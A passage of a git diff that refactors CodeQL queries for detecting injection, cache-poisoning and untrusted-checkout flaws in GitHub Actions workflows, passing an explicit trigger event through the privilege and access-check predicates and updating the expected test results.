codeql.actions.security.EnvPathInjectionQuery import EnvPathInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink +from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink, Event event where EnvPathInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + check.protects(sink.getNode().asExpr(), event, "code-injection") ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), - ["untrusted-checkout", "artifact-poisoning"]) + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) ) and sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 806bae2a91d2..b301915d79c5 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -18,30 +18,23 @@ import codeql.actions.dataflow.ExternalFlow import EnvVarInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Event event where EnvVarInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "envvar-injection") + check.protects(sink.getNode().asExpr(), event, "envvar-injection") ) and // exclude paths to file read sinks from non-artifact sources ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + check.protects(sink.getNode().asExpr(), event, "code-injection") ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), - ["untrusted-checkout", "artifact-poisoning"]) + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) ) and ( sink.getNode() instanceof EnvVarInjectionFromFileReadSink or diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index f5a4aed3eca0..80281e8db30a 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -17,10 +17,10 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph -from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Event event where CommandInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) + inPrivilegedContext(sink.getNode().asExpr(), event) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index 6f1f6008a062..2626de31935a 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -16,14 +16,12 @@ import codeql.actions.security.ArgumentInjectionQuery import ArgumentInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink, Event event where ArgumentInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "argument-injection") + check.protects(sink.getNode().asExpr(), event, "argument-injection") ) select sink.getNode(), source, sink, "Potential argument injection in $@ command, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index ec4925d24a0c..ef66ac229f2d 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -19,15 +19,11 @@ import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event event where CodeInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and - not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") - ) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index 67b615d115a6..411d0052d4bc 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -18,27 +18,27 @@ import codeql.actions.security.CachePoisoningQuery import CodeInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j, Event e +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob job, Event event where CodeInjectionFlow::flowPath(source, sink) and - j = sink.getNode().asExpr().getEnclosingJob() and - j.getATriggerEvent() = e and + job = sink.getNode().asExpr().getEnclosingJob() and + job.getATriggerEvent() = event and // job can be triggered by an external user - e.isExternallyTriggerable() and + event.isExternallyTriggerable() and // the checkout is not controlled by an access check not exists(ControlCheck check | - check.protects(source.getNode().asExpr(), j.getATriggerEvent(), "code-injection") + check.protects(source.getNode().asExpr(), event, "code-injection") ) and // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() and + not job.isPrivileged() and ( // the workflow runs in the context of the default branch - runsOnDefaultBranch(e) + runsOnDefaultBranch(event) or // the workflow caller runs in the context of the default branch - e.getName() = "workflow_call" and + event.getName() = "workflow_call" and exists(ExternalJob caller | - caller.getCallee() = j.getLocation().getFile().getRelativePath() and + caller.getCallee() = job.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index b6df022329dd..bda8224925ec 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -43,10 +43,10 @@ predicate controlledCachePath(string cache_path, string untrusted_path) { query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, Step source, Step s, string message, string path +from LocalJob job, Event event, Step source, Step step, string message, string path where // the job checkouts untrusted code from a pull request or downloads an untrusted artifact - j.getAStep() = source and + job.getAStep() = source and ( source instanceof PRHeadCheckoutStep and message = "due to privilege checkout of untrusted code." and @@ -58,35 +58,36 @@ where ) and // the checkout/download is not controlled by an access check not exists(ControlCheck check | - check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + check.protects(source, event, ["untrusted-checkout", "artifact-poisoning"]) ) and - j.getATriggerEvent() = e and + job.getATriggerEvent() = event and // job can be triggered by an external user - e.isExternallyTriggerable() and + event.isExternallyTriggerable() and ( // the workflow runs in the context of the default branch - runsOnDefaultBranch(e) + runsOnDefaultBranch(event) or // the workflow's caller runs in the context of the default branch - e.getName() = "workflow_call" and + event.getName() = "workflow_call" and exists(ExternalJob caller | - caller.getCallee() = j.getLocation().getFile().getRelativePath() and + caller.getCallee() = job.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) and // the job writes to the cache // (No need to follow the checkout/download step since the cache is normally write after the job completes) - j.getAStep() = s and - s instanceof CacheWritingStep and + job.getAStep() = step and + step instanceof CacheWritingStep and ( // we dont know what code can be controlled by the attacker path = "?" or // we dont know what files are being cached - s.(CacheWritingStep).getPath() = "?" + step.(CacheWritingStep).getPath() = "?" or // the cache writing step reads from a path the attacker can control - not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) + not path = "?" and controlledCachePath(step.(CacheWritingStep).getPath(), path) ) and - not s instanceof PoisonableStep -select s, source, s, "Potential cache poisoning in the context of the default branch " + message + not step instanceof PoisonableStep +select step, source, step, + "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql index 0750a02930eb..74f49fccd30a 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql @@ -20,10 +20,10 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, Step source, Step s, string message, string path +from LocalJob job, Event event, Step source, Step step, string message, string path where // the job checkouts untrusted code from a pull request or downloads an untrusted artifact - j.getAStep() = source and + job.getAStep() = source and ( source instanceof PRHeadCheckoutStep and message = "due to privilege checkout of untrusted code." and @@ -35,26 +35,27 @@ where ) and // the checkout/download is not controlled by an access check not exists(ControlCheck check | - check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + check.protects(source, event, ["untrusted-checkout", "artifact-poisoning"]) ) and - j.getATriggerEvent() = e and + job.getATriggerEvent() = event and // job can be triggered by an external user - e.isExternallyTriggerable() and + event.isExternallyTriggerable() and ( // the workflow runs in the context of the default branch - runsOnDefaultBranch(e) + runsOnDefaultBranch(event) or // the workflow's caller runs in the context of the default branch - e.getName() = "workflow_call" and + event.getName() = "workflow_call" and exists(ExternalJob caller | - caller.getCallee() = j.getLocation().getFile().getRelativePath() and + caller.getCallee() = job.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) and // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - source.getAFollowingStep() = s and - s instanceof PoisonableStep and + source.getAFollowingStep() = step and + step instanceof PoisonableStep and // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() -select s, source, s, "Potential cache poisoning in the context of the default branch " + message + not job.isPrivileged() +select step, source, step, + "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 7c7ab15de319..11897c464bf9 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -18,16 +18,18 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check +from + LocalJob job, MutableRefCheckoutStep checkout, PoisonableStep step, ControlCheck check, + Event event where - j.getAStep() = checkout and + job.getAStep() = checkout and // the checked-out code may lead to arbitrary code execution - checkout.getAFollowingStep() = s and + checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and + inPrivilegedContext(checkout, event) and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and - not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") -select s, checkout, s, + check.protects(checkout, event, "untrusted-checkout") and + not check.protects(checkout, event, "untrusted-checkout-toctou") +select step, checkout, step, "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 7f584e00c9ac..5956b52ccbe4 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -16,16 +16,17 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob j, MutableRefCheckoutStep checkout, ControlCheck check +from LocalJob job, MutableRefCheckoutStep checkout, ControlCheck check, Event event where - j.getAStep() = checkout and + job.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and + inPrivilegedContext(checkout, event) and + event = job.getATriggerEvent() and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and - not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") + check.protects(checkout, event, "untrusted-checkout") and + not check.protects(checkout, event, "untrusted-checkout-toctou") select checkout, "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index 82c6f936c51f..e4ab90e5fc2e 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -16,10 +16,13 @@ import codeql.actions.security.ArtifactPoisoningQuery import ArtifactPoisoningFlow::PathGraph import codeql.actions.security.ControlChecks -from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink +from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink, Event event where ArtifactPoisoningFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, "artifact-poisoning") + ) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql index a50c47a97935..5f676052ef68 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql @@ -16,8 +16,9 @@ import actions import codeql.actions.security.PoisonableSteps import codeql.actions.security.UseOfKnownVulnerableActionQuery -from UsesStep download, KnownVulnerableAction vulnerable_action +from UsesStep download, KnownVulnerableAction vulnerable_action, Event event where + event = download.getEnclosingJob().getATriggerEvent() and vulnerable_action.getVulnerableAction() = download.getCallee() and download.getCallee() = "actions/download-artifact" and ( @@ -28,7 +29,7 @@ where // exists a poisonable upload artifact in the same workflow exists(UsesStep checkout, PoisonableStep poison, UsesStep upload | download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and - download.getEnclosingJob().isPrivilegedExternallyTriggerable() and + download.getEnclosingJob().isPrivilegedExternallyTriggerable(event) and checkout.getCallee() = "actions/checkout" and checkout.getAFollowingStep() = poison and poison.getAFollowingStep() = upload and diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 31a4cdf94e54..f9f951917955 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -25,8 +25,7 @@ where // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and - event = checkout.getEnclosingJob().getATriggerEvent() and + inPrivilegedContext(step, event) and ( // issue_comment: check for date comparison checks and actor/access control checks event.getName() = "issue_comment" and @@ -36,12 +35,13 @@ where check instanceof AssociationCheck or check instanceof PermissionCheck ) and - check.dominates(checkout) and - date_check.dominates(checkout) + check.dominates(step) and + date_check.dominates(step) ) or // not issue_comment triggered workflows not event.getName() = "issue_comment" and - not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) + not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) ) -select step, checkout, step, "Execution of untrusted code on a privileged workflow." +select step, checkout, step, "Execution of untrusted code on a privileged workflow. $@", event, + event.getLocation().getFile().toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index bc6f0e36e56e..e130ba5dbb8a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -23,8 +23,7 @@ where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and - event = checkout.getEnclosingJob().getATriggerEvent() and + inPrivilegedContext(checkout, event) and ( // issue_comment: check for date comparison checks and actor/access control checks event.getName() = "issue_comment" and diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 8cc8e75c2af3..66c68e882e22 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -15,8 +15,6 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery -import codeql.actions.security.PoisonableSteps -import codeql.actions.security.ControlChecks from PRHeadCheckoutStep checkout where diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 609b09fdfef4..3ad4e6915d23 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -438,7 +438,6 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index afae24540787..006f365ae05c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -246,37 +246,42 @@ edges | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. | -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | 